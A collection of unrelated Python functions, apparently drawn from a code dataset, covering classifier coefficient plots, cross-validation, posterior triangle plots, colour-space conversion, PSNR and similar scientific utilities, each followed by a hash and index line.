def analyseClassificationCoefficients(X: pd.DataFrame, y: pd.Series, D_learning_results: pd.DataFrame, outputPath: str) -> dict: """ This function evaluates the importance coefficients of the input features of a model Args: X (pd.DataFrame): Input pandas dataFrame. y (pd.Series): Input pandas series sith target label. D_learning_results (pd.DataFrame): Results dataframe obstained from a grid search (analytics.learning.grids). outputPath (str): Output filename path to save the results. Returns: dict: DESCRIPTION. """ output_figures = {} # define the confusion matrix x_train, x_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=0) for index, row in D_learning_results.iterrows(): y_pred = row['MODEL'].predict(x_test) cm = confusion_matrix(y_test, y_pred) # plot the confusion matrix fig = plt.figure(figsize=(9, 9)) ax = fig.gca() sns.heatmap(cm, annot=True, fmt=".3f", linewidths=.5, square=True, cmap='Blues_r') plt.ylabel('Actual label') plt.xlabel('Predicted label') ax.set(xticks=np.arange(cm.shape[1]), yticks=np.arange(cm.shape[0])) ax.set_xticklabels(labels=row['MODEL'].classes_, rotation=45) ax.set_yticklabels(labels=row['MODEL'].classes_, rotation=45) all_sample_title = 'Accuracy Score: {0}'.format(np.round(row['SCORE_TEST'], 2)) plt.title(f"Model: {row['MODEL_NAME']}, {all_sample_title}", size=15) output_figures[f"{row['MODEL_NAME']}_confusionMatrix"] = fig # analyse output for QDA if row['MODEL_NAME'] == 'quadratic_discriminant_analysis': # Print the mean for each class # create a dataframe with one row for each feature of X features_list = list(X.columns) # extract coefficients riprendere da qui fig = plt.figure(figsize=(12, 10)) means = row['MODEL'].means_ means_scaled = scale(means) plt.imshow(means_scaled, cmap='bwr') ax = fig.gca() # set xticks ax.set_xticks(range(0, len(features_list))) ax.set_xticklabels(features_list, rotation=90) # set yticks ax.set_yticks(range(0, len(row['MODEL'].classes_))) ax.set_yticklabels(row['MODEL'].classes_, rotation=45) plt.colorbar() plt.xlabel('Feature name') plt.ylabel('Classes') plt.title('QDA means per class') output_figures[f"{row['MODEL_NAME']}_means"] = fig # analyse output for LDA elif row['MODEL_NAME'] == 'linear_discriminant_analysis': # Print coefficients # create a dataframe with one row for each feature of X features_list = list(X.columns) # extract coefficients riprendere da qui fig = plt.figure(figsize=(12, 10)) coefficients = row['MODEL'].coef_ coefficients_scaled = scale(coefficients) plt.imshow(coefficients_scaled, cmap='bwr') ax = fig.gca() # set xticks ax.set_xticks(range(0, len(features_list))) ax.set_xticklabels(features_list, rotation=90) # set yticks ax.set_yticks(range(0, len(row['MODEL'].classes_))) ax.set_yticklabels(row['MODEL'].classes_, rotation=45) plt.colorbar() plt.xlabel('Feature name') plt.ylabel('Classes') plt.title('LDA coefficients') output_figures[f"{row['MODEL_NAME']}_coefficients"] = fig # analyse output for logistic regression elif row['MODEL_NAME'] == 'logistic_regression': # Print coefficients # create a dataframe with one row for each feature of X features_list = list(X.columns) # extract coefficients riprendere da qui fig = plt.figure(figsize=(12, 10)) coefficients = row['MODEL'].coef_ coefficients_scaled = scale(coefficients) plt.imshow(coefficients_scaled, cmap='bwr') ax = fig.gca() # set xticks ax.set_xticks(range(0, len(features_list))) ax.set_xticklabels(features_list, rotation=90) # set yticks ax.set_yticks(range(0, len(row['MODEL'].classes_))) ax.set_yticklabels(row['MODEL'].classes_, rotation=45) plt.colorbar() plt.xlabel('Feature name') plt.ylabel('Classes') plt.title('Logistic regression coefficients') output_figures[f"{row['MODEL_NAME']}_coefficients"] = fig elif row['MODEL_NAME'] == 'naive bayes': # Print coefficients # create a dataframe with one row for each feature of X features_list = list(X.columns) # print variance fig = plt.figure(figsize=(12, 10)) coefficients = row['MODEL'].sigma_ coefficients_scaled = scale(coefficients) plt.imshow(coefficients_scaled, cmap='bwr') ax = fig.gca() # set xticks ax.set_xticks(range(0, len(features_list))) ax.set_xticklabels(features_list, rotation=90) # set yticks ax.set_yticks(range(0, len(row['MODEL'].classes_))) ax.set_yticklabels(row['MODEL'].classes_, rotation=45) plt.colorbar() plt.xlabel('Feature name') plt.ylabel('Classes') plt.title('Naive bayes sigma') output_figures[f"{row['MODEL_NAME']}_sigma"] = fig # print mean fig = plt.figure(figsize=(12, 10)) coefficients = row['MODEL'].theta_ coefficients_scaled = scale(coefficients) plt.imshow(coefficients_scaled, cmap='bwr') ax = fig.gca() # set xticks ax.set_xticks(range(0, len(features_list))) ax.set_xticklabels(features_list, rotation=90) # set yticks ax.set_yticks(range(0, len(row['MODEL'].classes_))) ax.set_yticklabels(row['MODEL'].classes_, rotation=45) plt.colorbar() plt.xlabel('Feature name') plt.ylabel('Classes') plt.title('Naive bayes theta') output_figures[f"{row['MODEL_NAME']}_theta"] = fig elif row['MODEL_NAME'] == 'decision tree': # Print coefficients # create a dataframe with one row for each feature of X features_list = list(X.columns) # print variance fig = plt.figure(figsize=(12, 10)) coefficients = row['MODEL'].feature_importances_ # coefficients_scaled = scale(coefficients) plt.bar(features_list, coefficients) ax = fig.gca() # set xticks # ax.set_xticks(range(0,len(features_list))) ax.set_xticklabels(features_list, rotation=45) plt.xlabel('Feature name') plt.ylabel('Feature importance') plt.title('Decision tree Gini importance') output_figures[f"{row['MODEL_NAME']}_Gini"] = fig # save the decision tree dotfile = open(f"{outputPath}//dt.dot", 'w') tree.export_graphviz(row['MODEL'], out_file=dotfile, feature_names=features_list, class_names=row['MODEL'].classes_, rounded=True, proportion=False, precision=2, filled=True) dotfile.close() # http://webgraphviz.com/ else: print(f"{row['MODEL_NAME']}, model not considered") return output_figures
2e6a1e4e05d505ab5e43c638810fc23a6b11a228
3,652,522
def centerfreq_to_bandnum(center_freq, norm_freq, nth_oct): """Returns band number from given center frequency.""" return nth_oct * np.log2(center_freq / norm_freq)
857b9b2598981ba608c958c8acce35a1e71d021f
3,652,523
from typing import Union from typing import Sequence from typing import Optional def crossval_model( estimator: BaseEstimator, X: pd.DataFrame, y: Union[pd.Series, pd.DataFrame], evaluators: Sequence[Evaluator], cv: Optional[ Union[int, BaseCrossValidator] ] = None, # defaults to KFold(n_splits=5) random_state: Optional[Union[int, np.random.RandomState]] = None, stratify: Optional[Union[np.ndarray, pd.Series]] = None, n_jobs=1, ) -> Sequence[Evaluator]: """ Evaluate a model using cross validation. A list of evaluators determines what other metrics, such as feature importance and partial dependence are computed """ # Run various checks and prepare the evaluators random_state = check_random_state(random_state) cv = 5 if cv is None else cv if isinstance(cv, int): cv = KFold(n_splits=cv, shuffle=True, random_state=random_state) cross_val_split_generator = cv.split(X, stratify) evalutors_evaluations = _repeatedly_evaluate_model( estimator=estimator, X=X, y=y, train_test_indices_generator=cross_val_split_generator, evaluators=evaluators, use_group_cv=False, random_state=random_state, name_for_logging="Cross validate", n_jobs=n_jobs, ) _set_evaluators_evaluations(evalutors_evaluations) return evalutors_evaluations
49c95241ed04c248221c6366cde717e575f5f7c1
3,652,524
import time def measure_dist(positions,weights,v_ref,side = False): """ Will plot the mouse and allow me to click and measure with two clicks side is false (so top view) but can be True, then it's cut though the major axis of hte mouse (determined by v_reference) """ # simplest trick is to just rotate all points so the reference # direction is perpendicular to x v_ref = np.append(v_ref,0) angle_with_x = angle_between(np.array([1.,0,0]),v_ref) RR = rotate_body_model(0,0,-angle_with_x) positions = (RR @ positions.T).T - v_ref if side: xx,yy = positions[:,0],positions[:,2] else: xx,yy = positions[:,0],positions[:,1] #top view plt.figure() plt.scatter(xx,yy,c= weights/np.max(weights),s = 5) # plt.xlim([-.05,.1]) # plt.ylim([0,.15]) ax = plt.gca plt.axes().set_aspect('equal', 'datalim') plt.title('click center of hip, then mid, then head of mouse!') w,h = 570,800 plt.get_current_fig_manager().window.setGeometry(1920-w-10,60,w,h) click_points = np.asanyarray(plt.ginput(0)) if click_points.shape[0] % 2 is not 0: print('missing a point') click_points = click_points[:-1,:] n_clicks = click_points.shape[0] start_points = click_points[np.arange(n_clicks)%2==0,:] end_points = click_points[np.arange(n_clicks)%2==1,:] n_points = start_points.shape[0] plt.figure() plt.scatter(xx,yy,c= weights/np.max(weights),s = 5) for s,e in zip(start_points,end_points): plt.plot([s[0],e[0]],[s[1],e[1]],'o-') dist = np.linalg.norm(end_points-start_points,axis = 1) leg_list = [str(np.round(d,decimals = 3))+" m" for d in dist] plt.legend(leg_list) plt.xlabel("x [m]") plt.ylabel("y [m]") plt.title('distance in meters') # plt.xlim([-.05,.1]) # plt.ylim([0,.15]) ax = plt.gca plt.axes().set_aspect('equal', 'datalim') timestr = time.strftime("%Y%m%d-%H%M%S") plt.savefig('/home/chrelli/git/3d_sandbox/mycetrack0p4/measurements/'+timestr+'.png') plt.show() w,h = 570,800 plt.get_current_fig_manager().window.setGeometry(1920-w-10,60,w,h) return dist
4d67344b0df64d3721d87803772c8aad15936fd9
3,652,525
def _get_draft_comments(request, issue, preview=False): """Helper to return objects to put() and a list of draft comments. If preview is True, the list of objects to put() is empty to avoid changes to the datastore. Args: request: Django Request object. issue: Issue instance. preview: Preview flag (default: False). Returns: 2-tuple (put_objects, comments). """ comments = [] tbd = [] # XXX Should request all drafts for this issue once, now we can. for patchset in issue.patchset_set.order('created'): ps_comments = list(models.Comment.gql( 'WHERE ANCESTOR IS :1 AND author = :2 AND draft = TRUE', patchset, request.user)) if ps_comments: patches = dict((p.key(), p) for p in patchset.patch_set) for p in patches.itervalues(): p.patchset = patchset for c in ps_comments: c.draft = False # Get the patch key value without loading the patch entity. # NOTE: Unlike the old version of this code, this is the # recommended and documented way to do this! pkey = models.Comment.patch.get_value_for_datastore(c) if pkey in patches: patch = patches[pkey] c.patch = patch if not preview: tbd.append(ps_comments) patchset.update_comment_count(len(ps_comments)) tbd.append(patchset) ps_comments.sort(key=lambda c: (c.patch.filename, not c.left, c.lineno, c.date)) comments += ps_comments return tbd, comments
affea5c09e42283057d70d7d1ce9f931d373d90d
3,652,526
def activate_model(cfg): """Activate the dynamic parts.""" cfg["fake"] = cfg["fake"]() return cfg
df8b0a23dc683435c1379e57bc9fd98149876d9d
3,652,527
def convert_to_number(string): """ Tries to cast input into an integer number, returning the number if successful and returning False otherwise. """ try: number = int(string) return number except: return False
30110377077357d3e7d45cac4c106f5dc9349edd
3,652,528
def _ts_value(position, counts, exposure, background, kernel, norm, flux_estimator): """Compute TS value at a given pixel position. Uses approach described in Stewart (2009). Parameters ---------- position : tuple (i, j) Pixel position. counts : `~numpy.ndarray` Counts image background : `~numpy.ndarray` Background image exposure : `~numpy.ndarray` Exposure image kernel : `astropy.convolution.Kernel2D` Source model kernel norm : `~numpy.ndarray` Norm image. The flux value at the given pixel position is used as starting value for the minimization. Returns ------- TS : float TS value at the given pixel position. """ dataset = SimpleMapDataset.from_arrays( counts=counts, background=background, exposure=exposure, kernel=kernel, position=position, norm=norm, ) return flux_estimator.run(dataset)
5a53a408205e5aecf0b2035efbc3feb33097e46c
3,652,529
from typing import List def mean(nums: List) -> float: """ Find mean of a list of numbers. Wiki: https://en.wikipedia.org/wiki/Mean >>> mean([3, 6, 9, 12, 15, 18, 21]) 12.0 >>> mean([5, 10, 15, 20, 25, 30, 35]) 20.0 >>> mean([1, 2, 3, 4, 5, 6, 7, 8]) 4.5 >>> mean([]) Traceback (most recent call last): ... ValueError: List is empty """ if not nums: raise ValueError("List is empty") return sum(nums) / len(nums)
3c802b4967f646b6338e52b4ce12977274054c15
3,652,530
import scipy def post_3d(post_paths, labels, colours, linestyles, contour_levels_sig, x_label=None, y_label=None, z_label=None, x_lims=None, y_lims=None, z_lims=None, smooth_xy=None, smooth_xz=None, smooth_yz=None, smooth_x=None, smooth_y=None, smooth_z=None, print_areas=False, save_path=None): """ Produce triangle plot showing multiple 3D posteriors, each as output by plot_utils.get_3d_post. Args: post_paths (list): List of paths to 3D posterior .npz files, each as output by plot_utils.get_3d_post. labels (list): List of legend labels, one for each posterior grid. colours (list): List of colours, one for each posterior grid. linestyles (list): List of linestyles, one for each posterior grid. contour_levels_sig (list): List of confidence regions to plot in ascending order, e.g. [1, 3]. x_label (str, optional): X-axis label - default None, i.e. no label. y_label (str, optional): Y-axis label - default None, i.e. no label. z_label (str, optional): Z-axis label - default None, i.e. no label. x_lims ((float, float), optional): X-axis limits - default None, limits set automatically. y_lims ((float, float), optional): Y-axis limits - default None, limits set automatically. z_lims ((float, float), optional): Z-axis limits - default None, limits set automatically. smooth_xy (list, optional): List of kernel standard deviations for Gaussian smoothing in the x-y plane, one for each posterior grid, or None for no smoothing (default None). smooth_xz (list, optional): List of kernel standard deviations for Gaussian smoothing in the x-z plane, one for each posterior grid, or None for no smoothing (default None). smooth_yz (list, optional): List of kernel standard deviations for Gaussian smoothing in the y-z plane, one for each posterior grid, or None for no smoothing (default None). smooth_x (list, optional): List of kernel standard deviations for Gaussian smoothing of the 1D x posterior, one for each posterior grid, or None for no smoothing (default None). smooth_y (list, optional): List of kernel standard deviations for Gaussian smoothing of the 1D y posterior, one for each posterior grid, or None for no smoothing (default None). smooth_z (list, optional): List of kernel standard deviations for Gaussian smoothing of the 1D z posterior, one for each posterior grid, or None for no smoothing (default None). print_areas (bool, optional): If True, print relative areas/widths of the different posteriors. Note that smoothing can affect these results, so for reliable results smoothing should be switched off to extract relative areas, and then smoothing values should be set to preserve unsmoothed relative areas. Default False. save_path (str, optional): Path to save figure to, if supplied. If not supplied, figure is displayed. """ # Load unnormalised 3D posteriors post_grids = [] for post_idx, post_path in enumerate(post_paths): print(f'Loading {post_idx + 1} / {len(post_paths)}') with np.load(post_path) as data: x_grid_tmp = data['x_grid'] y_grid_tmp = data['y_grid'] z_grid_tmp = data['z_grid'] post_grids.append(data['post_grid']) # Check grids consistent if post_idx == 0: x_grid, y_grid, z_grid = x_grid_tmp, y_grid_tmp, z_grid_tmp else: assert np.array_equal(x_grid, x_grid_tmp) assert np.array_equal(y_grid, y_grid_tmp) assert np.array_equal(z_grid, z_grid_tmp) # Form 1D & 2D grids print('Forming 1D & 2D grids') x = x_grid[:, 0, 0] y = y_grid[0, :, 0] z = z_grid[0, 0, :] xy_x, xy_y = np.meshgrid(x, y, indexing='ij') xz_x, xz_z = np.meshgrid(x, z, indexing='ij') yz_y, yz_z = np.meshgrid(y, z, indexing='ij') # Calculate integration elements print('Calculating integration elements') dx = x[1] - x[0] dy = y[1] - y[0] dz = z[1] - z[0] assert np.allclose(np.diff(x), dx) assert np.allclose(np.diff(y), dy) assert np.allclose(np.diff(z), dz) dxdy = dx * dy dxdz = dx * dz dydz = dy * dz dxdydz = dx * dy * dz # Normalise 3D posteriors print('Normalising') post_grids = [post_grid / (np.sum(post_grid) * dxdydz) for post_grid in post_grids] assert all([np.isclose(np.sum(post_grid) * dxdydz, 1) for post_grid in post_grids]) # Marginalise to get 2D posteriors print('Marginalising 3D -> 2D') posts_xy = [np.sum(post_grid, axis=2) * dz for post_grid in post_grids] posts_xz = [np.sum(post_grid, axis=1) * dy for post_grid in post_grids] posts_yz = [np.sum(post_grid, axis=0) * dx for post_grid in post_grids] assert all([np.isclose(np.sum(post_xy) * dxdy, 1) for post_xy in posts_xy]) assert all([np.isclose(np.sum(post_xz) * dxdz, 1) for post_xz in posts_xz]) assert all([np.isclose(np.sum(post_yz) * dydz, 1) for post_yz in posts_yz]) # Marginalise again to get 1D posteriors print('Marginalising 2D -> 1D') posts_x = [np.sum(post_xy, axis=1) * dy for post_xy in posts_xy] posts_y = [np.sum(post_xy, axis=0) * dx for post_xy in posts_xy] posts_z = [np.sum(post_xz, axis=0) * dx for post_xz in posts_xz] assert all([np.isclose(np.sum(post_x) * dx, 1) for post_x in posts_x]) assert all([np.isclose(np.sum(post_y) * dy, 1) for post_y in posts_y]) assert all([np.isclose(np.sum(post_z) * dz, 1) for post_z in posts_z]) # Additional marginalisation checks print('Checking normalisation') assert all([np.allclose(post_x, np.sum(post_xz, axis=1) * dz) for post_x, post_xz in zip(posts_x, posts_xz)]) assert all([np.allclose(post_y, np.sum(post_yz, axis=1) * dz) for post_y, post_yz in zip(posts_y, posts_yz)]) assert all([np.allclose(post_z, np.sum(post_yz, axis=0) * dy) for post_z, post_yz in zip(posts_z, posts_yz)]) assert all([np.allclose(post_x, np.sum(p_3d, axis=(1, 2)) * dydz) for post_x, p_3d in zip(posts_x, post_grids)]) assert all([np.allclose(post_y, np.sum(p_3d, axis=(0, 2)) * dxdz) for post_y, p_3d in zip(posts_y, post_grids)]) assert all([np.allclose(post_z, np.sum(p_3d, axis=(0, 1)) * dxdy) for post_z, p_3d in zip(posts_z, post_grids)]) # Apply smoothing if smooth_xy is not None: posts_xy = [ndimage.gaussian_filter(post_xy, [sig, sig / 2.]) for post_xy, sig in zip(posts_xy, smooth_xy)] if smooth_xz is not None: posts_xz = [ndimage.gaussian_filter(post_xz, sig) for post_xz, sig in zip(posts_xz, smooth_xz)] if smooth_yz is not None: posts_yz = [ndimage.gaussian_filter(post_yz, sig) for post_yz, sig in zip(posts_yz, smooth_yz)] if smooth_x is not None: posts_x = [ndimage.gaussian_filter(post_x, sig) for post_x, sig in zip(posts_x, smooth_x)] if smooth_y is not None: posts_y = [ndimage.gaussian_filter(post_y, sig) for post_y, sig in zip(posts_y, smooth_y)] if smooth_z is not None: posts_z = [ndimage.gaussian_filter(post_z, sig) for post_z, sig in zip(posts_z, smooth_z)] # Convert 2D & 1D posteriors to confidence levels print('Converting to confidence levels') confs_xy = [gcl_post.post_to_conf(post_xy, dxdy) for post_xy in posts_xy] confs_xz = [gcl_post.post_to_conf(post_xz, dxdz) for post_xz in posts_xz] confs_yz = [gcl_post.post_to_conf(post_yz, dydz) for post_yz in posts_yz] confs_x = [gcl_post.post_to_conf(post_x, dx) for post_x in posts_x] confs_y = [gcl_post.post_to_conf(post_y, dy) for post_y in posts_y] confs_z = [gcl_post.post_to_conf(post_z, dz) for post_z in posts_z] # Extract out relative widths and areas contour_levels = [0.] + [scipy.special.erf(contour_level / np.sqrt(2)) for contour_level in contour_levels_sig] if print_areas: print('Note that smoothing should be switched off to extract unbiased relative areas, and smoothing should be ' 'set such that relative areas are preserved') def count_points_within_outermost_contour(conf_grid): return np.count_nonzero(conf_grid < contour_levels[-1]) rel_areas_xy = list(map(count_points_within_outermost_contour, confs_xy)) print('Relative areas x-y:', np.divide(rel_areas_xy, max(rel_areas_xy))) rel_areas_xz = list(map(count_points_within_outermost_contour, confs_xz)) print('Relative areas x-z:', np.divide(rel_areas_xz, max(rel_areas_xz))) rel_areas_yz = list(map(count_points_within_outermost_contour, confs_yz)) print('Relative areas y-z:', np.divide(rel_areas_yz, max(rel_areas_yz))) rel_widths_x = list(map(count_points_within_outermost_contour, confs_x)) print('Relative widths x:', np.divide(rel_widths_x, max(rel_widths_x))) rel_widths_y = list(map(count_points_within_outermost_contour, confs_y)) print('Relative widths y:', np.divide(rel_widths_y, max(rel_widths_y))) rel_widths_z = list(map(count_points_within_outermost_contour, confs_z)) print('Relative widths z:', np.divide(rel_widths_z, max(rel_widths_z))) # Plot everything print('Plotting') plt.rcParams.update({'font.size': 13}) plt.rcParams['axes.titlesize'] = 17 fig, axes = plt.subplots(nrows=3, ncols=3, sharex='col', figsize=(12.8, 8.6)) plt.subplots_adjust(left=.08, right=.97, bottom=.08, top=.97, wspace=0, hspace=0) fill_colours = [[np.squeeze(matplotlib.colors.to_rgba_array(c, a)) for a in [0.3, 0.1, 0]] for c in colours] # Row 0: x for post_x, colour, fill, linestyle, label in zip(posts_x, colours, fill_colours, linestyles, labels): axes[0, 0].plot(x, post_x, color=colour, ls=linestyle, lw=2, label=label) axes[0, 0].fill_between(x, post_x, color=fill[1]) axes[0, 1].axis('off') axes[0, 2].axis('off') # Row 1: x vs y, y for conf_xy, post_y, colour, fill, linestyle in zip(confs_xy, posts_y, colours, fill_colours, linestyles): axes[1, 0].contour(xy_x, xy_y, conf_xy, levels=contour_levels, colors=colour, linestyles=[linestyle], linewidths=2) axes[1, 0].contourf(xy_x, xy_y, conf_xy, levels=contour_levels, colors=fill) axes[1, 1].plot(y, post_y, color=colour, ls=linestyle, lw=2) axes[1, 1].fill_between(y, post_y, color=fill[1]) axes[1, 2].axis('off') # Row 2: x vs z, y vs z, z for conf_xz, conf_yz, post_z, colour, fill, linestyle in zip(confs_xz, confs_yz, posts_z, colours, fill_colours, linestyles): axes[2, 0].contour(xz_x, xz_z, conf_xz, levels=contour_levels, colors=colour, linestyles=[linestyle], linewidths=2) axes[2, 0].contourf(xz_x, xz_z, conf_xz, levels=contour_levels, colors=fill) axes[2, 1].contour(yz_y, yz_z, conf_yz, levels=contour_levels, colors=colour, linestyles=[linestyle], linewidths=2) axes[2, 1].contourf(yz_y, yz_z, conf_yz, levels=contour_levels, colors=fill) axes[2, 2].plot(z, post_z, color=colour, ls=linestyle, lw=2) axes[2, 2].fill_between(z, post_z, color=fill[1]) # Hide y ticks for 1D posteriors axes[0, 0].tick_params(axis='y', which='both', left=False, labelleft=False) axes[1, 1].tick_params(axis='y', which='both', left=False, labelleft=False) axes[2, 2].tick_params(axis='y', which='both', left=False, labelleft=False) # Add x ticks at top and bottom of 2D posteriors and at bottom of 1D posteriors axes[0, 0].tick_params(axis='x', which='both', bottom=True, direction='in') axes[1, 0].tick_params(axis='x', which='both', top=True, bottom=True, direction='in') axes[2, 0].tick_params(axis='x', which='both', top=True, bottom=True, direction='inout', length=7.5) axes[0, 1].tick_params(axis='x', which='both', bottom=True, direction='in') axes[2, 1].tick_params(axis='x', which='both', top=True, bottom=True, direction='inout', length=7.5) axes[2, 2].tick_params(axis='x', which='both', bottom=True, direction='inout', length=7.5) # Add y ticks at left and right of 2D posteriors axes[1, 0].tick_params(axis='y', which='both', left=True, direction='inout', length=7.5) axes[1, 0].secondary_yaxis('right').tick_params(axis='y', which='both', right=True, direction='in', labelright=False) axes[2, 0].tick_params(axis='y', which='both', left=True, right=True, direction='inout', length=7.5) axes[2, 1].tick_params(axis='y', which='both', left=True, right=True, labelleft=False, direction='in') # Limits axes[2, 0].set_xlim(x_lims) axes[2, 1].set_xlim(y_lims) axes[2, 2].set_xlim(z_lims) axes[1, 0].set_ylim(y_lims) axes[2, 0].set_ylim(z_lims) axes[2, 1].set_ylim(z_lims) # Fix overlapping z tick labels by removing every other tick axes[2, 2].set_xticks(axes[2, 2].get_xticks()[1::2]) # Label axes axes[2, 0].set_xlabel(x_label) axes[2, 1].set_xlabel(y_label) axes[2, 2].set_xlabel(z_label) axes[1, 0].set_ylabel(y_label) axes[2, 0].set_ylabel(z_label) fig.align_ylabels() # Title axes[0, 0].annotate('Full Euclid-like mask', xy=(2.95, .95), xycoords='axes fraction', ha='right', va='top', size=plt.rcParams['axes.titlesize']) # Legend leg_title = f'{min(contour_levels_sig)}\N{en dash}{max(contour_levels_sig)}$\\sigma$ confidence' axes[0, 0].legend(loc='upper right', bbox_to_anchor=(3, .8), handlelength=4, frameon=False, title=leg_title) if save_path is not None: plt.savefig(save_path) print('Saved ' + save_path) else: plt.show()
5e25de6f69a7d281e59ac1423b6be4b27080a689
3,652,531
def det(m1: ndarray) -> float: """ Compute the determinant of a double precision 3x3 matrix. https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/det_c.html :param m1: Matrix whose determinant is to be found. :return: The determinant of the matrix. """ m1 = stypes.to_double_matrix(m1) return libspice.det_c(m1)
aa0a6629536df22ea016bb81a8e62769c7b3ab9e
3,652,532
def path_to_xy(path: PointList) -> XYList: """Convert PointList to XYList""" return [p.xy() for p in path]
ea8cc222ab2b8ce6634e9bb1ea7d456bfa451782
3,652,533
def is_gzip(name): """Return True if the name indicates that the file is compressed with gzip.""" return name.endswith(".gz")
a6ea06f04808a07c4b26338f87273986eda86ef1
3,652,535
def possible_sums_of(numbers: list) -> list: """Compute all possible sums of numbers excluding self.""" possible_sums = [] for idx, nr_0 in enumerate(numbers[:-1]): for nr_1 in numbers[idx + 1:]: possible_sums.append(nr_0 + nr_1) return possible_sums
39ebe3e48c45a9c30f16b43e6c34778c5e813940
3,652,537
def normalize_norms(X, scale_factor=1, axis=0, by='sum'): """ wrapper of `normalize_colsum` and `normalize_rowsum` Parameters ---------- X: a (sparse) matrix scale_factor: numeric, None if None, use the median of sum level as the scaling factor. axis: int, {0, 1} if axis = 0, apply to each column; if axis = 1, apply to each row. by: str, {'sum', 'max'} normalization method """ foo = normalize_col if axis == 0 else normalize_row return foo(X, scale_factor=scale_factor, by=by)
7c491245fc83b2b48c21cb91f79915af7261f5ba
3,652,538
def full_solution(combined, prob_dists): """ combined: (w, n-1->n-w, 3, 3) prob_dists: (n, 3, total_reads) p[v,g,k] = prob of observing k of total_reads on ref if gneotype ig on varaint v """ N = len(combined[0])+1 best_idx, best_score = np.empty(N), -np.inf*np.ones(N) for j, counts in enumerate(combined, 1): scores = get_scores(counts, prob_dists[:-j]) do_update = scores>best_score[j:] best_score[j:][do_update] = scores[do_update] best_idx[j:][do_update] = np.flatnonzero(do_update) rev_scores = get_scores(counts.swapaxes(-2, -1), prob_dists[j:]) do_update = rev_scores>best_score[:-j] best_score[:-j][do_update] = rev_scores[do_update] best_idx[:-j][do_update] = np.flatnonzero(do_update)+j return best_idx
2732c57e44aa0c17bd652b01226053c095d9fdb3
3,652,539
def ycbcr2bgr(img): """Convert a YCbCr image to BGR image. The bgr version of ycbcr2rgb. It implements the ITU-R BT.601 conversion for standard-definition television. See more details in https://en.wikipedia.org/wiki/YCbCr#ITU-R_BT.601_conversion. It differs from a similar function in cv2.cvtColor: `YCrCb <-> BGR`. In OpenCV, it implements a JPEG conversion. See more details in https://en.wikipedia.org/wiki/YCbCr#JPEG_conversion. Args: img (ndarray): The input image. It accepts: 1. np.uint8 type with range [0, 255]; 2. np.float32 type with range [0, 1]. Returns: ndarray: The converted BGR image. The output image has the same type and range as input image. """ img_type = img.dtype img = _convert_input_type_range(img) * 255 out_img = np.matmul( img, [ [0.00456621, 0.00456621, 0.00456621], [0.00791071, -0.00153632, 0], [0, -0.00318811, 0.00625893], ], ) * 255.0 + [-276.836, 135.576, -222.921] out_img = _convert_output_type_range(out_img, img_type) return out_img
e5e5c408e40645ae4844635fd0fbf065746f187d
3,652,540
from datetime import datetime def tensorize_fg_coeffs( data, wgts, fg_model_comps, notebook_progressbar=False, verbose=False, ): """Initialize foreground coefficient tensors from uvdata and modeling component dictionaries. Parameters ---------- data: list list of tf.Tensor objects, each with shape (ngrps, nbls, nfreqs) representing data wgts: list list of tf.Tensor objects, each with shape (ngrps, nbls, nfreqs) representing weights. fg_model_comps: list list of fg modeling tf.Tensor objects representing foreground modeling vectors. Each tensor is (nvecs, ngrps, nbls, nfreqs) see description in tensorize_fg_model_comps_dict docstring. notebook_progressbar: bool, optional use progress bar optimized for notebook output. default is False. verbose: bool, optional lots of text output default is False. Returns ------- fg_coeffs_re: tf.Tensor object 1d tensor containing real parts of coeffs for each modeling vector. ordering is over foreground modeling vector per redundant group and then redundant group in the order of groups appearing in red_grps fg_coeffs_im: tf.Tensor object 1d tensor containing imag parts of coeffs for each modeling vector. ordering is over foreground modeling vector per redundant group and then redundant group in the order of groups appearing in red_grps """ echo( f"{datetime.datetime.now()} Computing initial foreground coefficient guesses using linear-leastsq...\n", verbose=verbose, ) fg_coeffs = [] nchunks = len(data) binary_wgts = [ tf.convert_to_tensor(~np.isclose(wgts[cnum].numpy(), 0.0), dtype=wgts[cnum].dtype) for cnum in range(nchunks) ] for cnum in PBARS[notebook_progressbar](range(nchunks)): # set up linear leastsq fg_coeff_chunk = [] ngrps = data[cnum].shape[0] ndata = data[cnum].shape[1] * data[cnum].shape[2] nvecs = fg_model_comps[cnum].shape[0] # pad with zeros for gnum in range(ngrps): nonzero_rows = np.where( np.all(np.isclose(fg_model_comps[cnum][:, gnum].numpy().reshape(nvecs, ndata), 0.0), axis=1) )[0] if len(nonzero_rows) > 0: nvecs_nonzero = np.min(nonzero_rows) else: nvecs_nonzero = nvecs # solve linear leastsq fg_coeff_chunk.append( tf.reshape( tf.linalg.lstsq( tf.transpose(tf.reshape(fg_model_comps[cnum][:, gnum], (nvecs, ndata)))[:, :nvecs_nonzero], tf.reshape(data[cnum][gnum] * binary_wgts[cnum][gnum], (ndata, 1)), ), (nvecs_nonzero,), ) ) # pad zeros at the end back up to nvecs. fg_coeff_chunk[-1] = tf.pad(fg_coeff_chunk[-1], [(0, nvecs - nvecs_nonzero)]) # add two additional dummy indices to satify broadcasting rules. fg_coeff_chunk = tf.reshape(tf.transpose(tf.stack(fg_coeff_chunk)), (nvecs, ngrps, 1, 1)) fg_coeffs.append(fg_coeff_chunk) echo( f"{datetime.datetime.now()} Finished initial foreground coefficient guesses...\n", verbose=verbose, ) return fg_coeffs
dbff52b154326df6a324ef454887c65bfe528044
3,652,541
def receive_incoming_bets(): """ Sends fixtures to the front-end """ return fixtures.fixtures_information
2ab61c0bc15bb9c8c4359bb8ca7e8b1287b1d182
3,652,542
def fibonacci(n): """ object: fibonacci(n) returns the first n Fibonacci numbers in a list input: n- the number used to calculate the fibonacci list return: retList- the fibonacci list """ if type(n) != int: print(n) print(":input not an integer") return False if n <= 0: print(str(n)+"not a postive integer") return False f1=1 f2=1 retList=[] for i in range (0,n): retList.append(f1) fn=f1+f2 f1=f2 f2=fn return retList
ac37d952eecae57b33fb3768f1c8097d76769534
3,652,543
def psnr_batch(_mse_batch_val): """ :param _mse_val_each: ndarray :return: ndarray Usage: 1) The Bath is deal with channel. Thus, it is recommended to call mse_batch function before the psnr_batch function. 2) cumsum_psnr_rgb += (metric_.psnr_batch(_mse_batch_val=(metric_.mse_batch(_ndarr_input=imgcv_.batch2channel(_ndarr=ndarr_input), _ndarr_ref=imgcv_.batch2channel(_ndarr=ndarr_ref), _num_colr_channel=3)))).sum() """ return (10 * np.log10((255.0 ** 2) / _mse_batch_val))
c33eaa3e04fbd7d9749ad8989a15ea198ff4d806
3,652,544
